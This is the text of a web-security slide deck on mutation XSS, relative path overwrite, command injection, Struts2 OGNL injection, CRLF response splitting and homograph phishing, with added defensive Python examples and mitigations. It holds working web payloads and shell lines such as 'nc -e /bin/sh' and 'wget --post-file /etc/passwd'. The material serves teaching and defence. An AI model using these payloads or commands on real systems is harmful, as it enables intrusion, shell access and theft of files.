4. It’s all about PoPuP
LesserKnownWebAppAttacks
Cross-site Scripting: Mutation XSS
5. HTML-encoded payload
<listing><img src=1 onerror=alert(1)></listing>
We now read this element back through the innerHTML property and
inject the result into another piece of code:
<listing id=x><img src=1 onerror=alert(1)></listing>
<script>alert(document.getElementById('x').innerHTML)</script>
When this code executes, the browser looks up the element with
document.getElementById('x') and serialises its contents through the
innerHTML getter. That serialisation is not a faithful copy of what was
parsed: the content goes through a further level of decoding, so text
that was safe as stored is returned as markup containing a live
onerror handler. Re-inserting that string (for example by assigning it
back to innerHTML) is the second parse that fires the payload. This is
the mutation: multiple levels of decoding move the content from a safe
to an unsafe state.
8. Mitigation:
Server-side mitigation
• Avoid outputting server content that the browser would otherwise
convert incorrectly (content whose meaning changes when it is decoded
and re-serialised).
• Replace the flawed content with semantically equivalent content that
the browser converts properly.
Client-side mitigation
• Browsers should implement ECMAScript 5 or higher.
• TrueHTML: relies on the XMLSerializer DOM object provided by all user
agents to serialise markup, instead of the lossy innerHTML getter.
• https://cure53.de/fp170.pdf
9. Cross-site Scripting: RPO XSS
Relative Path Overwrite XSS
• Difference between absolute and relative URLs:
• Absolute URL: https://thehacker.co.in/test
• Relative URL: test/some_subdirectory (resolved against the directory
of the current document, so it changes when the document's path changes)
To exploit this finding, three things are necessary:
1) Stored attacker-controlled content in the page that allows CSS
injection.
2) URL rewriting (the server serves the same page when extra path
segments are appended).
3) Relative addressing of the CSS style sheet.
10. DEMO
• Step 1: Visit www.webdevelopersnotes.com/graphics/index.php3
• To check for URL rewriting, append a '/' to the URL. If the same page
is served, the browser now resolves the relative stylesheet path
underneath index.php3/, so the page itself (with the injected CSS) is
fetched as the style sheet.
• Open the rewritten URL with the XSS payload in IE and see the magic ;)
• http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php/
Mitigation:
• It is recommended that absolute URLs be used throughout a site.
• Otherwise root-relative URLs (starting with '/') should be used: they
resolve from the site root regardless of the document's path, so a
trailing-slash rewrite cannot redirect them.
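Added example (not from the slides): a small Python check of the three
addressing styles under the trailing-slash rewrite described above, using
the standard library's urljoin, which resolves references the same way a
browser does. The host name and stylesheet paths are constructed for the
example and are not real sites.

```python
from urllib.parse import urljoin

# Constructed sample: a page that links its stylesheet three different ways.
# host.example is an assumed, non-existent host.
PAGE = "http://host.example/graphics/index.php3"
STYLESHEET_HREFS = {
    "relative":      "style.css",
    "root-relative": "/graphics/style.css",
    "absolute":      "http://host.example/graphics/style.css",
}


def resolve_stylesheet(document_url, href):
    """Resolve a <link href> the way a browser does: against the document's
    *current* URL, trailing slash included."""
    return urljoin(document_url, href)


def rpo_exposed(document_url, href):
    """True if appending '/' to the document URL moves the stylesheet fetch
    underneath the document itself. On a server that rewrites extra path
    segments back to the same page, that fetch returns the page as CSS."""
    original = resolve_stylesheet(document_url, href)
    rewritten = resolve_stylesheet(document_url + "/", href)
    return original != rewritten


def audit(document_url, hrefs):
    """Map each addressing style to whether it is RPO-exposed."""
    return {kind: rpo_exposed(document_url, href) for kind, href in hrefs.items()}


if __name__ == "__main__":
    for kind, href in STYLESHEET_HREFS.items():
        print(kind, "->", resolve_stylesheet(PAGE + "/", href),
              "EXPOSED" if rpo_exposed(PAGE, href) else "ok")
```

Only the plain relative reference changes target when '/' is appended;
the root-relative and absolute forms resolve identically, which is the
reason behind the mitigation.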
15. Now what if ';' is blocked by the application?
X ;Y = separating commands (run X and then Y, regardless of the success of X)
X |Y = PIPE (run X and pass the output of X to Y)
X ^Y = PIPEZ
X &&Y = AND (run Y if X succeeded)
X ||Y = OR (run Y if X failed)
X %0D Y%0D Z = newline separator (URL-encoded CR): run X, then Y, then Z
` X ` = backtick command substitution (X is executed and its output is
substituted into the command line)
X &Y = background (run X in the background and Y immediately,
regardless of the success of X)
$( command ) = command substitution, same as backticks
nc -e /bin/sh = Netcat (spawn a shell on the connection)
wget --post-file /etc/passwd = WGET (POST a local file to a remote server)
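Added example (not from the slides): Python code showing why a blacklist
of ';' alone does not stop command injection, and the two fixes that do.
The ping command and the sample inputs are constructed for the example;
the separator list is the one from the slide.

```python
import shlex
import subprocess

# Chaining tokens from the slide. A filter that only removes ';' leaves
# every other entry usable.
SEPARATORS = {
    ";":  "run X then Y",
    "|":  "pipe X into Y",
    "&&": "run Y if X succeeded",
    "||": "run Y if X failed",
    "&":  "run X in background, then Y",
    "\n": "newline, same as ';'",
    "\r": "carriage return (%0D in a URL)",
    "`":  "backtick command substitution",
    "$(": "command substitution",
}


def chained_despite_semicolon_filter(user_input):
    """Separators that survive a naive ';' strip and still chain a command."""
    stripped = user_input.replace(";", "")
    return [sep for sep in SEPARATORS if sep in stripped]


def vulnerable(host):
    """Command string handed to /bin/sh: every token in SEPARATORS is live."""
    return "ping -c 1 " + host


def hardened_argv(host):
    """argv list executed without a shell: the whole input is a single
    argument to ping, so metacharacters have no meaning."""
    return ["ping", "-c", "1", host]


def hardened_shell(host):
    """If a shell is unavoidable, quote the argument so separators become
    literal characters inside a single-quoted word."""
    return "ping -c 1 " + shlex.quote(host)


def echo_argv(arg):
    """Show that argv passing keeps metacharacters literal (uses echo, which
    exists on any POSIX system, rather than ping)."""
    completed = subprocess.run(["echo", arg], capture_output=True,
                               text=True, check=True)
    return completed.stdout.rstrip("\n")


if __name__ == "__main__":
    for probe in ("127.0.0.1;id", "127.0.0.1|id", "$(id)", "127.0.0.1"):
        print(repr(probe), "chains via:", chained_despite_semicolon_filter(probe))
        print("  shell=True would run:", vulnerable(probe))
        print("  argv form:", hardened_argv(probe))
        print("  quoted form:", hardened_shell(probe))
```

The argv form is the right fix: subprocess.run(hardened_argv(host)) never
invokes a shell. shlex.quote is the fallback for code that must build a
shell string.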
16. RCE never dies!!!
• Parameters prefixed with "action:", "redirect:" or "redirectAction:"
are not properly sanitized.
• Their value is evaluated as an OGNL (Object-Graph Navigation
Language) expression against the value stack, which makes it possible
to inject server-side code.
Apache Struts2 RCE
http://host/struts2-blank/example/X.action?action:${3*4}
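Added example (not from the slides): detection logic for the probe above,
run over a few constructed access-log lines. The behaviour described on the
slide is the one covered by the Struts advisory S2-016 (CVE-2013-2251);
the log lines, IP addresses and timestamps are made up for the example.
If the server evaluates the expression, the arithmetic result (12) shows
up in the response instead of the literal string, which is why ${3*4} is
a common first probe.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameter prefixes named on the slide, and the openers of an OGNL expression.
STRUTS_PREFIXES = ("action:", "redirect:", "redirectAction:")
OGNL_OPENERS = ("${", "%{")

# Constructed sample log (Apache common log format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2013:13:55:36 +0000] "GET /struts2-blank/example/X.action?action:${3*4} HTTP/1.1" 200 512',
    '10.0.0.6 - - [10/Oct/2013:13:55:40 +0000] "GET /struts2-blank/example/HelloWorld.action?redirect:%24%7B%23context%7D HTTP/1.1" 302 0',
    '10.0.0.7 - - [10/Oct/2013:13:56:01 +0000] "GET /struts2-blank/example/HelloWorld.action?lang=en HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_params(url):
    """Return the decoded query tokens whose name carries one of the redirect
    prefixes and which open an OGNL expression. The probe on the slide has no
    '=', so the whole thing is the parameter name with an empty value."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        token = name if value == "" else f"{name}={value}"
        if token.startswith(STRUTS_PREFIXES) and any(o in token for o in OGNL_OPENERS):
            hits.append(token)
    return hits


def scan_log(lines):
    """Lines whose request URL carries a prefixed OGNL expression."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and suspicious_params(match.group(1)):
            findings.append(line)
    return findings


if __name__ == "__main__":
    for line in scan_log(SAMPLE_LOG):
        print("STRUTS OGNL PROBE:", line)
```

parse_qsl percent-decodes the query, so the encoded variant on the second
line (%24%7B...) is caught as well as the literal one; the third line, a
normal parameter, is not flagged.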
18. Divide and Conquer: CRLF Attack
• CR stands for Carriage Return (ASCII 13, \r)
• LF stands for Line Feed (ASCII 10, \n)
How does this attack work?
The server script embeds user data in HTTP response headers.
Example: Step 1: There is a redirection page, redir_lang.jsp. When we
hit the index page, the server responds with a redirect built by the
following code:
<%
response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang"));
%>
20. Let's attack ;)
Step 3: Instead of passing the value English, pass the attack vector
shown below:
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
Note: the CRLF sequences are URL-encoded as %0d%0a.
Let's see what the server responds with.
21. The raw server output now contains:
• A first HTTP response, which is a 302 (redirection) response.
• A second HTTP response, which is a 200 response, with content
comprising 19 bytes of HTML.
• Superfluous data.
22. So when the attacker feeds the target with two requests, the first
being to the URL
/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>
and the second to the URL /index.html,
the target would believe that the first request is matched to the
first response (the 302), and that the second request (to /index.html)
is matched to the second response (the attacker's 200 with "Shazam").
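Added example (not from the slides): a Python model of the splitting in
slides 18 to 22. It reproduces the redirect the JSP would emit when the
decoded parameter is copied verbatim into the Location header, carves the
resulting byte stream into responses the way a Content-Length-driven client
or proxy would, and shows the check that stops it. The 302 reason phrase
and the assumption that the container does not itself strip CR/LF are mine.

```python
from urllib.parse import unquote

# The attack vector from the slide, CRLF sequences URL-encoded as sent.
PAYLOAD = ("foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
           "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
           "Content-Length:%2019%0d%0a%0d%0a<html>Shazam</html>")


def vulnerable_redirect(lang):
    """Models response.sendRedirect("/by_lang.jsp?lang=" + lang) on a
    container that copies the decoded parameter into Location verbatim
    (assumption for the example)."""
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: /by_lang.jsp?lang=" + lang + "\r\n"
            "\r\n").encode()


def header_value_is_safe(value):
    """A header value may not contain the characters that end a header line."""
    return "\r" not in value and "\n" not in value


def hardened_redirect(lang):
    """Same redirect, but refuse any value that could start a new header."""
    if not header_value_is_safe(lang):
        raise ValueError("CR/LF in header value")
    return vulnerable_redirect(lang)


def split_responses(stream):
    """Carve a byte stream into HTTP responses: header block up to the blank
    line, then a body of Content-Length bytes. Returns a list of
    (status line, headers, body) tuples; trailing junk is ignored."""
    responses = []
    while True:
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep or not head.strip():
            break  # no further complete header block: superfluous data
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode()] = value.strip().decode()
        length = int(headers.get("content-length", "0"))
        body, stream = rest[:length], rest[length:]
        responses.append((lines[0].decode(), headers, body.decode()))
    return responses


if __name__ == "__main__":
    raw = vulnerable_redirect(unquote(PAYLOAD))
    for status, headers, body in split_responses(raw):
        print(status, headers, repr(body))
```

The decoded payload turns one redirect into two responses: the 302 with
Content-Length 0 and a 200 carrying the 19-byte "Shazam" document that a
proxy would pair with the next request in the pipeline.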
23. What can an attacker do with a CRLF attack?
Cross-site scripting >>
http://blog.innerht.ml/twitter-crlf-injection
Web cache poisoning (defacement)
Cross-user attacks (single user, single page, temporary defacement)
Hijacking pages with user-specific information
Browser cache poisoning
27. What can an attacker do with a homograph attack?
Phishing
Unvalidated redirection
Fake websites
An attacker may combine this with SSL attacks:
http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf
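Added example (not from the slides): Python code showing what a homograph
domain looks like to the resolver and one check a phishing filter can
apply. The lookalike domain is constructed for the example (a Cyrillic
small a, U+0430, in place of the Latin one); Python's idna codec applies
IDNA2003 rules, and the mixed-script test via Unicode character names is a
simplification of the script-mixing restrictions browsers implement.

```python
import unicodedata

# Constructed samples: the genuine name and a lookalike with Cyrillic U+0430.
GENUINE = "apple.com"
LOOKALIKE = "\u0430pple.com"


def to_ascii(domain):
    """The IDNA (punycode) form, which is what is actually resolved and
    what the certificate is issued for."""
    return domain.encode("idna").decode("ascii")


def scripts_of(label):
    """Heuristic script set of a label: the first word of each letter's
    Unicode name (LATIN, CYRILLIC, GREEK, ...)."""
    return {unicodedata.name(ch).split()[0] for ch in label if ch.isalpha()}


def is_mixed_script(domain):
    """True if any label mixes scripts, the classic homograph pattern.
    Whole-script confusables (every letter Cyrillic) are not caught here."""
    return any(len(scripts_of(label)) > 1 for label in domain.split("."))


def looks_alike(candidate, genuine):
    """Same rendered text under NFKC normalisation as far as casefolding goes,
    but a different wire-level name: the homograph condition."""
    same_ascii = to_ascii(candidate) == to_ascii(genuine)
    return not same_ascii and candidate.casefold() != genuine.casefold() \
        and len(candidate) == len(genuine)


if __name__ == "__main__":
    for name in (GENUINE, LOOKALIKE):
        print(repr(name), "->", to_ascii(name),
              "MIXED SCRIPT" if is_mixed_script(name) else "single script")
```

The two names render identically in most fonts, but the lookalike resolves
as xn--pple-43d.com, a different registration with its own certificate,
which is the gap the phishing and SSL-attack combinations above exploit.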